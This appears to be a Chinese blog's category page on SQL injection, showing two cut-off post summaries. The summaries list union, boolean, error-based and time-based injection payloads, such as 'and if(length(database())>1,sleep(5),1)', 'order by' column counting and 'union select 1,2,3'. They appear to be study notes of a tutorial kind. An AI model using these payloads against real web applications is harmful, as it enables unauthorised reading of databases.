随笔分类 - sql注入
摘要:union注入 boolean注入 报错注入 时间注入语句: if(expr1,expr2,expr3) :若expr1为true,则执行expr2,否则执行expr3. 判断数据库库名长度: and if(length(databse())>1,sleep(5),1) 判断数据库库名:and if
阅读全文
摘要:整形注入 id=1 and 1=1 %23 id=1 and 1=2 %23 //判断是否整形注入 id=1 order by 3id=1 order by 4 //判断列数 id=1 and 1=2 union select 1,2,3 //判断显示位 查看所有数据库:id=1 and 1=2 u
阅读全文